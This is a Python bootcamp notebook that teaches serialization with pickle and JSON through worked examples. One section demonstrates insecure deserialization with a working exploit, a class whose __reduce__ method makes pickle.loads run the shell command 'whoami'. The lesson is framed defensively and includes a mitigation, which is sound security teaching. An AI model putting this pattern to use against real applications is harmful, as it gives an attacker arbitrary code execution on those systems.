![NASA](http://www.nasa.gov/sites/all/themes/custom/nasatwo/images/nasa-logo.svg)

<center>
<h1><font size="+3">GSFC Python Bootcamp</font></h1>
</center>

---
<center>
<H1 style="color:red">
Serialization and Deserialization with Python
</H1>
</center>


In [None]:
from __future__ import print_function

## Useful References

- <a href="https://en.wikipedia.org/wiki/Serialization">Serialization</a> (Wikipedia)
- <a href="https://mindmajix.com/python/serialization">Serialization in python</a>
- <a href="https://code.tutsplus.com/tutorials/serialization-and-deserialization-of-python-objects-part-1--cms-26183">Serialization and Deserialization of Python Objects</a>

# <font color="blue"> Serialization and Deserialization</font>

> … the process of translating data structures or object state into a format that can be stored … or transmitted … and reconstructed later (possibly in a different computer environment). (Wikipedia)

* **Serialization** is a process of transforming objects or data structures into byte streams or strings. 
* These byte streams can then be stored or transferred easily. 
* This allows the developers to save, for example, configuration data or user's progress, and then store it (on disk or in a database) or send it to another location.
* The reverse process of serialization is known as **deserialization**.

### Why do we need serialization?

We need serialization for the following reasons:

- **Communication**: A serialized object can be transmitted to another process or machine, which lets multiple computer systems share the same data.
- **Caching**: Deserializing an object is often faster than building it from scratch, so large or expensive objects can be cached in serialized form.
- **Deep Copy**: Serializing an object to a byte array and then deserializing it produces an independent replica of the object.
- **Portability**: A major advantage of serialization is that serialized data can be read across different architectures or operating systems.
- **Persistence**: The state of an object can be serialized and stored (for example, in a file or a database) so that it can be retrieved later.
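
The deep-copy point can be illustrated with a minimal sketch. It assumes Python's built-in `pickle` module (covered later in this notebook); the dictionary contents are hypothetical and chosen only for illustration.

```python
import pickle

# Hypothetical nested data used only for illustration.
original = {"instrument": "MODIS", "bands": [1, 2, 3]}

# Serialize to bytes, then rebuild a brand-new object from those bytes.
clone = pickle.loads(pickle.dumps(original))

# Mutating the clone leaves the original untouched.
clone["bands"].append(4)

print(original["bands"])  # [1, 2, 3]
print(clone["bands"])     # [1, 2, 3, 4]
```

Because the clone is rebuilt from bytes, it shares no mutable state with the original.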

![fig_sd](https://miro.medium.com/max/1150/1*9zJJ65xk8agiQXlqd7nYUw.jpeg)
Image Source: Phonlawat Khunphet

# <font color="blue">Pickle</font>

## <font color="red"> What is pickle?</font>

* The `pickle` module is used for serializing and deserializing a Python object structure.
* Most Python objects can be pickled so that they can be saved on disk; exceptions include open files, sockets, and lambda functions.
* `pickle` serializes the object first before writing it to a file.
* Pickling (serialization) converts a Python object (list, dict, etc.) into a byte stream that contains all the information necessary to reconstruct the object in another Python script.

The following types can be serialized and deserialized using the `pickle` module:
* All native datatypes supported by Python (booleans, None, integers, floats, complex numbers, strings, bytes, byte arrays)
* Dictionaries, sets, lists, and tuples - as long as they contain pickleable objects
* Functions (pickled by their name references, and not by their value) and classes that are defined at the top level of a module
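
A short sketch of what "pickled by name reference" means in practice. It uses the built-in `len` as a stand-in for any importable function, and a lambda as an example of a function that has no importable name; the variable names are illustrative only.

```python
import pickle

# A built-in function is pickled by reference: the payload stores only
# the module and function name, not the function's code.
payload = pickle.dumps(len)
print(b"len" in payload)             # True
print(pickle.loads(payload) is len)  # True

# A lambda has no importable name, so pickle cannot reference it.
try:
    pickle.dumps(lambda x: x + 1)
    lambda_pickled = True
except (pickle.PicklingError, AttributeError) as err:
    lambda_pickled = False
    print("Cannot pickle lambda:", type(err).__name__)
```

The same rule explains why a function or class must be importable in the environment that unpickles it.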

![fig_pickle](https://pythontic.com/python_pickle.png)

## <font color="red">Applications of Pickling</font>

* Saving a program's state data to disk so that it can carry on where it left off when restarted (persistence)
* Sending python data over a TCP connection in a multi-core or distributed system (marshalling)
* Storing python objects in a database
* Converting an arbitrary Python object to a byte string so that it can be used as a dictionary key (e.g. for caching & memoization)
* Machine Learning (saving <a href="https://pythonprogramming.net/pickle-classifier-save-nltk-tutorial/">trained ML algorithm</a>)
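
The dictionary-key application can be sketched as follows. The `total` function and the `cache` dictionary are hypothetical names. Note that equal objects are not guaranteed to produce identical pickle bytes in every case, so this is a sketch for simple inputs and not a general-purpose cache.

```python
import pickle

cache = {}

def total(values):
    """Sum a list, caching results keyed by the pickled argument."""
    key = pickle.dumps(values)  # bytes are hashable, lists are not
    if key not in cache:
        cache[key] = sum(values)
    return cache[key]

print(total([1, 2, 3]))  # 6
print(total([1, 2, 3]))  # 6, served from the cache
print(len(cache))        # 1
```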

## <font color="red">How to Use pickle</font>

In [None]:
import pickle

The main functions of `pickle` are:

* `dump()`: serializes an object and writes the pickled data to the designated file.
* `load()`: takes a file object, reconstructs the object from the pickled representation, and returns it.
* `dumps()`: serializes a Python object hierarchy and returns it as a `bytes` object, without writing anything to a file.
* `loads()`: reconstructs an object from pickled data held in a `bytes` object.

`dump()`/`load()` serialize/deserialize objects through files, whereas `dumps()`/`loads()` work with `bytes` objects in memory.
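
The two pairs of functions can be compared side by side. In this sketch, `io.BytesIO` stands in for a binary file on disk, and the `record` dictionary is a hypothetical example.

```python
import io
import pickle

record = {"station": "BLD", "latitude": 40.0}

# dumps()/loads(): work with a bytes object in memory.
blob = pickle.dumps(record)
from_bytes = pickle.loads(blob)

# dump()/load(): work with a binary file-like object.
# io.BytesIO stands in for a file opened in 'wb'/'rb' mode.
buffer = io.BytesIO()
pickle.dump(record, buffer)
buffer.seek(0)  # rewind before reading
from_file = pickle.load(buffer)

print(type(blob).__name__)                # bytes
print(from_bytes == from_file == record)  # True
```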

### Python Object Serialization

The pickle module turns an arbitrary Python object into a series of bytes. This process is also called serialization. 
* Useful for storing data
* Inter process communication

In [None]:
data_org = { 'a':'A', 'b':2, 'c':3.0 } 
print('Type: ', type(data_org))
print('DATA:', data_org)

The `dumps()` function returns the pickled representation of the object as a `bytes` object.

In [None]:
data_string = pickle.dumps(data_org)
print('Type: ', type(data_string))
print('PICKLE:', data_string )

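By default, Python 3 uses a binary pickle protocol, so the output generally contains non-printable bytes. Only the legacy protocol 0 (`protocol=0`) produces a human-readable representation.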
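
The `protocol` argument of `dumps()` selects the encoding. The sketch below compares protocol 0 with the default protocol for the same dictionary; for this ASCII-only data the protocol 0 payload can be decoded as ASCII text.

```python
import pickle

data = {'a': 'A', 'b': 2, 'c': 3.0}

# Protocol 0 is the original text-based protocol.
text_pickle = pickle.dumps(data, protocol=0)
print(text_pickle.decode('ascii'))

# The default protocol is binary; its payload starts with the
# PROTO opcode (byte 0x80) followed by the protocol number.
binary_pickle = pickle.dumps(data)
print(pickle.DEFAULT_PROTOCOL, binary_pickle[:2])

# Both payloads decode to the same dictionary.
print(pickle.loads(text_pickle) == pickle.loads(binary_pickle) == data)  # True
```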

### Python Object Deserialization

* Once the data is serialized, you can write it to a file, socket, pipe, etc. 
* Then later you can read the file and unpickle the data to construct a new object with the same values.

**Get the data back from the serialized object**

In [None]:
print('BEFORE: ', data_org)

The `loads()` function converts a bytes-like object containing pickled data back into the corresponding Python object.

In [None]:
data2 = pickle.loads(data_string)
print('AFTER:  ',data2)

In [None]:
print('EQUAL?:', (data_org == data2))
print('SAME ?:', (data_org is data2))

**Write pickled data to a file and Read the data back**

The `dump()` function writes the byte representation of a supported Python object to a file. The file must be opened in **binary mode for writing**.

In [None]:
with open('pickled_data_file.pkl', 'wb') as fid:
     pickle.dump(data_org, fid)

The `load()` function reads the byte data from a binary file and converts it to a Python object.

In [None]:
# Read the data from the file
with open('pickled_data_file.pkl', 'rb') as fid:
     data3 = pickle.load(fid)

In [None]:
print('Data Before Write:', data_org)
print('Data After  Read :', data3)
print('EQUAL?:', (data_org == data3))

### Pickling and Unpickling Custom Objects

**Example 1**: Instance of a class

In [None]:
class Planets:
    def __init__(self, planet_name, planet_size):
        self.size = planet_size
        self.name = planet_name

In [None]:
mercury = Planets('Mercury', 1516.0)

* The file is opened in binary mode for writing. 

In [None]:
with open('pickle_instance.pkl', 'wb') as pickle_out:
     pickle.dump(mercury, pickle_out)

* The file is opened in binary mode for reading. 

In [None]:
with open('pickle_instance.pkl', 'rb') as pickle_in:
     unpickled_mercury = pickle.load(pickle_in)

In [None]:
print("Name: ", unpickled_mercury.name)
print("Size: ", unpickled_mercury.size)

**Example 2**: Collection of objects

In [None]:
def my_func():
    return "my_func was called"

In [None]:
with open('pickle_objects.pkl', 'wb') as pickle_out:
     # serialize class object
     pickle.dump(Planets, pickle_out)
     # serialize class instance
     pickle.dump(Planets('Jupiter', 43441), pickle_out)
     # serialize function object
     pickle.dump(my_func, pickle_out)
     # serialize complex number
     pickle.dump(3.7 + 2.5j, pickle_out)
     # serialize bytes object
     pickle.dump(bytes([1, 2, 3, 4, 5]), pickle_out)

* Objects are returned in the same order in which we have pickled them in the first place. 
* When there is no more data to return, the `load()` function raises `EOFError`.
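
When the number of pickled objects is not known in advance, `EOFError` can serve as the stop condition of a read loop. The sketch below uses `io.BytesIO` in place of a file on disk; the items written are hypothetical.

```python
import io
import pickle

# io.BytesIO stands in for a binary file on disk.
stream = io.BytesIO()
for item in ("Jupiter", 43441, 3.7 + 2.5j):
    pickle.dump(item, stream)

stream.seek(0)  # rewind before reading
loaded = []
while True:
    try:
        loaded.append(pickle.load(stream))
    except EOFError:
        break  # no more pickled objects in the stream

print(loaded)  # ['Jupiter', 43441, (3.7+2.5j)]
```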

In [None]:
with open('pickle_objects.pkl', 'rb') as pickle_in:
    # deserialize class object
    NewPlanets = pickle.load(pickle_in)
    # deserialize class instance
    new_jupiter = pickle.load(pickle_in)
    # deserialize function object
    new_func = pickle.load(pickle_in)
    # deserialize complex number
    new_complex = pickle.load(pickle_in)
    # deserialize bytes object
    new_byte = pickle.load(pickle_in)
    # nothing is left in the file, so one more load() raises EOFError
    try:
        pickle.load(pickle_in)
    except EOFError:
        print("EOFError: no more objects to load")

* Once you have unpickled the data you can use it like an ordinary Python object.

In [None]:
mercury = NewPlanets('Mercury', 1516.0)
print(mercury.name, mercury.size)

In [None]:
print(new_jupiter.name, new_jupiter.size)

In [None]:
new_func()

In [None]:
print("Complex Number: ", new_complex)
print("Byte object: ", new_byte)

### Application: Insecure Deserialization

- This example will serialize an exploit to run the `whoami` command, and deserialize it with pickle.loads().

In [None]:
%%writefile insecure_deserialization.py

import os
import pickle

# Attacker prepares exploit that application will insecurely deserialize
class Exploit(object):
   def __reduce__(self):
       """
         A special method that is referenced when we are serializing data. 
         The reduce function essentially tells the pickle library how to serialize the object. 
         Then, when we are unserializing the data, this information is used to rebuild the object.
       """
       return (os.system, ('whoami',))

# Attacker serializes the exploit
def serialize_exploit():
    shellcode = pickle.dumps(Exploit())
    return shellcode

# Application insecurely deserializes the attacker's serialized data
def insecure_deserialization(exploit_code):
    return pickle.loads(exploit_code)
    
if __name__ == '__main__':
   # Serialize the exploit
   shellcode = serialize_exploit()
   print("shellcode: {}".format(shellcode))

   # Attacker's payload runs a `whoami` command
   insecure_deserialization(shellcode)

- Imagine the above scenario in the context of a web application. 
- If you must use a native serialization format like Python’s pickle, be very careful and use it only on trusted input. 
- Never deserialize data that has travelled over a network or come from a data source or input stream that is not controlled by your application.
- To significantly reduce the likelihood of introducing insecure deserialization vulnerabilities, prefer language-agnostic data formats such as JSON, XML, or YAML, parsed with loaders that do not construct arbitrary objects (for example, PyYAML's `yaml.safe_load`).
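
If `pickle` cannot be avoided, one possible mitigation is to restrict which globals an unpickler may resolve by overriding `Unpickler.find_class`. The sketch below is deliberately strict and forbids every global, so only plain built-in data loads. `RestrictedUnpickler` and `restricted_loads` are hypothetical names, and this reduces the risk without making untrusted pickles safe in general.

```python
import io
import os
import pickle

class Exploit:
    """Same idea as the exploit above: unpickling would call os.system."""
    def __reduce__(self):
        return (os.system, ('whoami',))

class RestrictedUnpickler(pickle.Unpickler):
    """Hypothetical helper that refuses to resolve any global name."""
    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            "global '{}.{}' is forbidden".format(module, name))

def restricted_loads(data):
    """Like pickle.loads(), but only plain built-in data can be loaded."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

# Plain data (dicts, lists, numbers, strings) still loads normally.
safe = restricted_loads(pickle.dumps({'a': [1, 2.0, 'three']}))
print(safe)

# The exploit is rejected before os.system can be looked up.
try:
    restricted_loads(pickle.dumps(Exploit()))
    blocked = False
except pickle.UnpicklingError as err:
    blocked = True
    print("Blocked:", err)
```

A real application would typically allow a small whitelist of known-safe classes in `find_class` instead of rejecting everything.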

## <font color="red">Conclusions</font>

**Advantages**

1. Helps in saving complicated data.
2. Easy to use: it requires only a few lines of code.
3. Saved data is not human-readable. This is obscurity and not security: pickled data is neither encrypted nor protected against tampering.

**Disadvantages**

1. Non-Python programs may not be able to reconstruct pickled Python objects.
2. Security risks in unpickling data from malicious sources.

**When to Pickle**

* Pickling is useful for applications where you need some degree of persistency in your data. Your program's state data can be saved to disk, so you can continue working on it later on. 
* It can also be used to send data over a Transmission Control Protocol (TCP) or socket connection, or to store python objects in a database. 
* Pickle is very useful for when you're working with machine learning algorithms, where you want to save them to be able to make new predictions at a later time, without having to rewrite everything or train the model all over again.

**When Not to Pickle**

* If you want to use data across different programming languages, pickle is not recommended. Its protocol is specific to Python, thus, cross-language compatibility is not guaranteed. 
* The same holds for different versions of Python itself. Newer pickle protocols cannot be read by older Python versions, and unpickling custom classes requires compatible class definitions to be importable, so a file pickled in one environment may not load in another.
* Do not unpickle data from an untrusted source. Malicious code inside the file can be executed upon unpickling.

# <font color="blue">JSON</font>

## <font color="red"> What is JSON?</font>

* JSON (JavaScript Object Notation) is a popular data format used for representing structured data. 
* It is a language-independent text format that can be used in Python and Perl, among other languages.
* The JSON format is commonly used for data communication between servers and web applications.
* It is built on two structures:

     - A collection of name/value pairs. This is realized as an object, record, dictionary, hash table, keyed list, or associative array.
     - An ordered list of values. This is realized as an array, vector, list, or sequence.
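
In Python these two structures map to `dict` and `list`. A minimal sketch with the standard `json` module, using hypothetical sample strings:

```python
import json

# A JSON object (name/value pairs) becomes a Python dict.
obj = json.loads('{"acronym": "BLD", "latitude": 40.0}')
print(type(obj).__name__, obj)  # dict {'acronym': 'BLD', 'latitude': 40.0}

# A JSON array (ordered list of values) becomes a Python list.
arr = json.loads('["coffee", "tea", "water"]')
print(type(arr).__name__, arr)  # list ['coffee', 'tea', 'water']
```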

## <font color="red">JSON Data</font>

In [None]:
import json

The main functions of the `json` module are:

- `dump()`: takes a Python object, serializes it, and writes the resulting JSON text to a file-like object.
- `load()`: reads a JSON document from a file-like object and returns the corresponding Python object.
- `dumps()`: converts a Python data structure to a JSON string.
- `loads()`: converts a JSON string into Python data.
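
The four functions can be compared in a few lines. In this sketch, `io.StringIO` stands in for a text file on disk, and `record` is a hypothetical example.

```python
import io
import json

record = {"acronym": "BHD", "latitude": -41.28, "longitude": 174.87}

# dumps()/loads(): work with a str in memory.
text = json.dumps(record)
from_text = json.loads(text)

# dump()/load(): work with a text file-like object.
# io.StringIO stands in for a file opened in 'w'/'r' mode.
buffer = io.StringIO()
json.dump(record, buffer)
buffer.seek(0)  # rewind before reading
from_file = json.load(buffer)

print(type(text).__name__)               # str
print(from_text == from_file == record)  # True
```

Unlike `pickle`, the `json` functions produce and consume text, so files are opened in text mode.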

**Example of JSON Data**

```python
{
    "stations": [
        {
            "acronym": "BLD",
            "name": "Boulder Colorado",
            "latitude": 40.00,
            "longitude": -105.25
        },
        {
            "acronym": "BHD",
            "name": "Baring Head Wellington New Zealand",
            "latitude": -41.28,
            "longitude": 174.87
        }
    ]
}
```

**Another Example of JSON Data**

We consider an online database, <a href="http://ip-api.com">IP-API.com</a>, that returns GeoIP data in JSON format. Simply opening <a href="http://ip-api.com/json/54.148.84.95">http://ip-api.com/json/54.148.84.95</a> will return the following JSON result:


```python
{
  "as": "AS16509 Amazon.com, Inc.",
  "city": "Boardman",
  "country": "United States",
  "countryCode": "US",
  "isp": "Amazon",
  "lat": 45.8696,
  "lon": -119.688,
  "org": "Amazon",
  "query": "54.148.84.95",
  "region": "OR",
  "regionName": "Oregon",
  "status": "success",
  "timezone": "America\/Los_Angeles",
  "zip": "97818"
}
```

To see your own Geolocation data in JSON format, just open <a href="http://ip-api.com/json/">http://ip-api.com/json/</a>.

+ A JSON object consists of key-value pairs enclosed in `{` `}`, where every key is a double-quoted string.
+ JSON data representation is very similar to Python dictionaries.
+ It supports primitive types, like strings and numbers, as well as nested arrays and objects.

## <font color="red">Convert Python Data Types into JSON </font>

Python objects and their equivalent conversion to JSON.

| Python | JSON Equivalent |
| --- | ---  |
| `dict` | object |
| `list`, `tuple` | array |
| `str` | string |
| `int`, `float` | number |
| `True` | true |
| `False` | false |
| `None` | null |

In [None]:
print("Dictionary: ", json.dumps({"name": "John", "age": 30}))
print("List:       ", json.dumps(["apple", "bananas"]))
print("Tuple:      ", json.dumps(("apple", "bananas")))
print("String:     ", json.dumps("hello"))
print("Integer:    ", json.dumps(42))
print("Float:      ", json.dumps(31.76))
print("True:       ", json.dumps(True))
print("False:      ", json.dumps(False))
print("None:       ", json.dumps(None))
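
The mapping is not fully reversible. The sketch below shows two well-known consequences: tuples come back as lists, and non-string dictionary keys come back as strings. The dictionary is a hypothetical example.

```python
import json

original = {"children": ("Ann", "Billy"), 1: "integer key"}
restored = json.loads(json.dumps(original))

print(restored)
# {'children': ['Ann', 'Billy'], '1': 'integer key'}
print(restored == original)  # False
```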

**Convert JSON to Python Object (Dict)**

In [None]:
json_data = '{"acronym": "BLD", \
              "name": "Boulder Colorado", \
              "latitude": 40.00,  \
              "longitude": -105.25}'
python_obj = json.loads(json_data)
print("Name:     ", python_obj["name"])
print("Acronym:  ", python_obj["acronym"])
print("Latitude: ", python_obj["latitude"])
print("Longitude:", python_obj["longitude"])

In [None]:
print(json.dumps(python_obj, sort_keys=True, indent=4))

**Convert JSON to Python Object (List)**

In [None]:
array = '{"drinks": ["coffee", "tea", "water"]}'
data = json.loads(array)

print(json.dumps(data, sort_keys=True, indent=4))
print()
for element in data["drinks"]:
    print(element)

**Convert JSON to Python Object**

In [None]:
json_input = '{"stations": [{"acronym": "BLD", \
                                "name": "Boulder Colorado", \
                            "latitude": 40.00, \
                            "longitude": -105.25}, \
                            {"acronym": "BHD", \
                             "name": "Baring Head Wellington New Zealand",\
                             "latitude": -41.28, \
                             "longitude": 174.87}]}'

In [None]:
decoded = json.loads(json_input)
for x in decoded['stations']:
    print(x["name"])

In [None]:
print(json.dumps(decoded, sort_keys=True, indent=4))

**Convert Python Object (Dict) to JSON**

In [None]:
d = {}
d["name"] = "Boulder Colorado"
d["acronym"] = "BLD"
d["latitude"] = 40.00
d["longitude"] = -105.25
d_js = json.dumps(d, ensure_ascii=False)
print(d_js)

**Convert Python Objects into JSON**

In [None]:
x = {
  "name": "John",
  "age": 30,
  "married": True,
  "divorced": False,
  "children": ("Ann","Billy"),
  "pets": None,
  "cars": [
    {"model": "BMW 230", "mpg": 27.5},
    {"model": "Ford Edge", "mpg": 24.1}
  ]
}

print("Python Object: \n\t", x)

In [None]:
for key in x:
    print("{}:\t {}".format(key, x[key]))

In [None]:
x_js = json.dumps(x)
print("Corresponding JSON Object: \n\t", x_js)

Going Back to Python:

In [None]:
y = json.loads(x_js)
for key in y:
    print(key+":\t", y[key])

**Convert a JSON String to Python Data**

In [None]:
json_string = """
{
    "researcher": {
        "name": "Ford Prefect",
        "species": "Betelgeusian",
        "relatives": [
            {
                "name": "Zaphod Beeblebrox",
                "species": "Betelgeusian"
            }
        ]
    }
}
"""
data = json.loads(json_string)
print(json.dumps(data, sort_keys=True, indent=4))

## <font color="red"> Serialization and Deserialization</font>

**Serialization**

We use the `dump()` function, which takes two arguments:
* The data object to be serialized.
* The file object to which it will be written.

In [None]:
file_name = "Sample.json"
with open(file_name, "w") as fid: 
     json.dump(x, fid)

The file object does not have to be a traditional file; any file-like object with a `write()` method will work.

In [None]:
import sys
json.dump(x, sys.stdout)

**Deserializing JSON**

* Deserialization is the opposite of serialization, i.e. the conversion of JSON data into the corresponding Python objects.
* We use the `load()` function to read from a file object (and `loads()` to read from a string). The root of the result is usually a `dict` or a `list`.

In [None]:
with open(file_name, "r") as fid: 
     z = json.load(fid)
        
print(z)

In [None]:
for key in z:
    print(key+":\t", z[key])

**Example**

Consider the following JSON data (from NASA's Astronomy Picture of the Day API) that we write in a file named `apod.json`.

In [None]:
%%writefile apod.json
{
    "media_type": "image",
    "copyright": "Yin Hao",
    "date": "2018-10-30",
    "url": "https://apod.nasa.gov/apod/image/1810/Orionids_Hao_960.jpg",
    "explanation": "Meteors have been shooting out from the constellation of Orion. This was expected, as October is the time of year for the Orionids Meteor Shower.  Pictured here, over two dozen meteors were caught in successively added exposures last October over Wulan Hada volcano in Inner Mongolia, China. The featured image shows multiple meteor streaks that can all be connected to a single small region on the sky called the radiant, here visible just above and to the left of the belt of Orion, The Orionids meteors started as sand sized bits expelled from Comet Halley during one of its trips to the inner Solar System. Comet Halley is actually responsible for two known meteor showers, the other known as the Eta Aquarids and visible every May. An Orionids image featured on APOD one year ago today from the same location shows the same car. Next month, the Leonids Meteor Shower from Comet Tempel-Tuttle should also result in some bright meteor streaks. Follow APOD on: Facebook, Instagram, Reddit, or Twitter",
    "hdurl": "https://apod.nasa.gov/apod/image/1810/Orionids_Hao_2324.jpg",
    "title": "Orionids Meteors over Inner Mongolia",
    "service_version": "v1"
}

Read the file:

In [None]:
with open("apod.json", "r") as f:
    json_text = f.read()

Decode the JSON string into a Python dictionary:

In [None]:
apod_dict = json.loads(json_text)
print(apod_dict['explanation'])

Encode the Python dictionary into a JSON string:

In [None]:
new_json_string = json.dumps(apod_dict, indent=6)
print(new_json_string)

In [None]:
new_json_string = json.dumps(apod_dict, indent=6, sort_keys=True)
print(new_json_string)

## <font color="red">Conclusion</font>

* JSON is standardized and language-independent (while `pickle` is specific to Python).
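* It is more secure than `pickle` because parsing JSON does not execute code; which of the two is faster depends on the data and on the Python version.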
* If you only need to use Python, then the `pickle` module is still a good choice for its ease of use and ability to reconstruct complete Python objects.
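
The difference in what each format can represent is easy to demonstrate. This sketch uses a set and a complex number, two built-in types with no JSON equivalent; the `value` dictionary is hypothetical.

```python
import json
import pickle

value = {"samples": {1, 2, 3}, "gain": 3.7 + 2.5j}

# pickle restores the set and the complex number unchanged.
restored = pickle.loads(pickle.dumps(value))
print(restored == value)  # True

# json has no representation for these types and raises TypeError.
try:
    json.dumps(value)
    json_ok = True
except TypeError as err:
    json_ok = False
    print("json.dumps failed:", err)
```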